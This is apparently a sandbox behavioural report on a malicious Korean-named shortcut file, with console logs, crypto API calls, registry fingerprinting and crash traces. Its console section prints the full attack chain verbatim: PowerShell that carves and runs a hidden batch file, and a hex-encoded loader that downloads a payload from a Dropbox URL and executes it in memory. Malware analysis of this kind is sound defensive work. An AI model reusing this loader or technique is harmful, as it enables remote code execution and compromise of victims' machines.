0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;" console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: Remove-Item : Cannot remove item C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조 console_handle: 0x0000002b	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: 사2023.lnk: The process cannot access the file 'C:\Users\test22\AppData\Local\Te console_handle: 0x00000037	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: mp\주요도시 시장가격 조사2023.lnk' because it is being used by another process. console_handle: 0x00000043	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: At line:1 char:892 console_handle: 0x0000004f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: + $dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Prog console_handle: 0x0000005b	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: ram Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-Chi console_handle: 0x00000067	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: ldItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} console_handle: 0x00000073	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStr console_handle: 0x0000007f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: eam($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFil console_handle: 0x0000008b	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: e.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x console_handle: 0x00000097	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: 00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.l console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: nk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x000 console_handle: 0x000000af	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: 0A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnk console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: File.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $ex console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: ePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnk console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: File.Close();remove-item <<<< -path $lnkPath -force; console_handle: 0x000000df	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: + CategoryInfo : WriteError: (C:\Users\test22...시장가격 조사2023.lnk:F console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: ileInfo) [Remove-Item], IOException console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: + FullyQualifiedErrorId : RemoveFileSystemItemIOError,Microsoft.PowerShell console_handle: 0x00000103	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: .Commands.RemoveItemCommand console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: /min c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}" console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: call console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}" console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s console_handle: 0x00000023	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: upported." console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: At line:1 char:28 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur console_handle: 0x00000047	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: ityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern In console_handle: 0x00000053	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: tPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA" console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool Virtu console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: alProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinitio console_handle: 0x00000077	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: n $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https:// console_handle: 0x00000083	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: dl.dropboxusercontent.com/scl/fi/h7p5aearkbq6rnb2oh633/20231028_selca.zip?rlkey console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 30, 2023, 5:46 p.m.	buffer: =8gmnnfrezz2vnndsr1cz781cv&dl=0";$bb='[DllImport("kernel32.dll")]public static console_handle: 0x0000009b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 276 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 30, 2023, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (4 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{FDF3ECB9-B56F-43B2-A9B8-1B48B6BAE1A7}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{191301D3-A579-428C-B0C7-D7988500F9E3}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{90140000-0011-0000-0000-0000000FF1CE}\DigitalProductID
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{6F327760-8C5C-417C-9B61-836A98287E0C}\DigitalProductID

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 30, 2023, 5:45 p.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 30, 2023, 5:46 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6d0133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6d022074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x657885c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x6e40dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x6db0c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6d519076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6d47c60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6d472ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 104984844 registers.edi: 104985008 registers.eax: 104984844 registers.ebp: 104984924 registers.edx: 0 registers.ebx: 104986060 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ Oct. 30, 2023, 5:46 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6d0133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6d023102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x657af7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x6e40e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x6e40e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x6ded4871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x6ded48ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6d6c4ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6da6d7ab ??0OdfStgParams@@QAE@XZ+0xed734 mso+0xff063a @ 0x6e44063a DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x6db0c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6d518ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6d507292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6d506de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6d506d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6d503f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6d504b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6d503a43 MdCallBack-0x9c7613 excel+0x2651a @ 0x2f0b651a MdCallBack-0x9c9bd0 excel+0x23f5d @ 0x2f0b3f5d MdCallBack-0x9e98e2 excel+0x424b @ 0x2f09424b MdCallBack-0x9e9c23 excel+0x3f0a @ 0x2f093f0a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce 